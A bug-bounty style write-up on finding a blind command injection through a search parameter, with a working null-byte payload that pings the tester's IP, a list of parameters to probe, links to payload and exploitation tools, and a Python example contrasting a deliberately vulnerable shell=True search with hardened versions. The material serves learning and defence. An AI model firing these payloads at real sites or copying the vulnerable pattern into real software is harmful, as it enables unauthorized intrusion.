Blind Command Injection - It hurts
Summary:
Command injection is a type of attack that executes arbitrary commands on the host operating system. It happens when an application passes unsafe user-supplied data to a system shell, and it is possible because of insufficient input validation.
Generally it is tough to find command injection, but luckily I found one a few months ago. I noticed something weird with the GET parameter /?search= when I was testing for command injection. I tested many payloads, but nothing worked.
When I checked the response in Burp Suite it said “this object will store some %symbols% in the javascript space, so that libs can read them”, so I thought it might be a blind command injection and used tcpdump to find out. Tcpdump comes pre-installed in Kali Linux.
How to find this vulnerability?
1. Go to your target website and check for some common parameters (in my case it was /?search=).
2. I tried injecting a payload by simply using a pipe operator, but I didn't get any response; it was a normal 200 OK.
3. I used many payloads for testing, but only one worked, which was a bypass using a null byte character.
4. I started tcpdump on Kali because I knew that it was a blind command injection.
You can use payloads from here: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
My custom payload that worked: http://www.mytarget.com/?search=%00{.exec|ping <MyIP>
You can also use Wireshark instead of tcpdump for checking blind command injection.
Though I found this command injection after a lot of effort, it was a duplicate of another report on a private program :( .
Some Common Parameters For Testing Command Injection:
/?query=
/?email=
/?id=
/?username=
/?user=
/?to=
/?from=
/?search=
/?q=
/?s=
/?shopId=
/?blogId=
/?phone=
/?mode=
/?next=
/?firstname=
/?lastname=
/?locale=
/?cmd=
/?sys=
/?system=
There is a good tool on GitHub for detecting command injection vulnerabilities automatically.
Link: https://github.com/commixproject/commix
Commix is an automated tool written by Anastasios Stasinopoulos that can be used by web developers, penetration testers or security researchers to test web-based applications with the aim of finding bugs, errors or vulnerabilities related to command injection attacks. With this tool it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.
Mitigation: To prevent command injection, never call out to OS commands from application-layer code.
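As an added example (not the author's code), here is the vulnerable pattern this write-up describes beside two hardened forms in Python, assuming a search endpoint that greps a constructed in-memory corpus: an allowlist rejects the pipe and %00 null-byte payloads before anything runs, and the search is then done in-process or, if an external program is unavoidable, through an argument list with no shell.

```python
import re
import subprocess

# Constructed corpus standing in for whatever the ?search= endpoint searched.
CORPUS = "apple pie\nbanana split\ncherry tart\n"

# Allowlist for the search term: letters, digits, space and hyphen, 1-64 chars.
# Anything else (pipe, semicolon, backtick, the %00 null byte, ...) is rejected
# before any command could see it.
SAFE_TERM = re.compile(r"[A-Za-z0-9 -]{1,64}")


def vulnerable_search(term: str) -> str:
    """Vulnerable pattern: untrusted input spliced into a shell command string.
    A term like 'pie; echo INJECTED' runs a second command. Shown for contrast only."""
    proc = subprocess.run(f"grep {term}", input=CORPUS, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def hardened_search(term: str) -> str:
    """Hardened: validate, then do the work in-process. With no shell and no
    external command there is nothing to inject into."""
    if not SAFE_TERM.fullmatch(term):
        raise ValueError("rejected search term")
    return "\n".join(line for line in CORPUS.splitlines() if term in line)


def hardened_search_subprocess(term: str) -> str:
    """If an external program is unavoidable: validated input, argument list,
    no shell=True, and '--' so a term starting with '-' is not read as an option."""
    if not SAFE_TERM.fullmatch(term):
        raise ValueError("rejected search term")
    proc = subprocess.run(["grep", "--", term], input=CORPUS,
                          capture_output=True, text=True)
    return proc.stdout


def is_rejected(term: str) -> bool:
    """True when the allowlist stops the term before any command runs."""
    try:
        hardened_search(term)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(repr(vulnerable_search("pie; echo INJECTED")))  # the second command ran
    print(repr(hardened_search("pie")))                    # 'apple pie'
    print(is_rejected("\x00{.exec|ping 192.0.2.1"))        # True
```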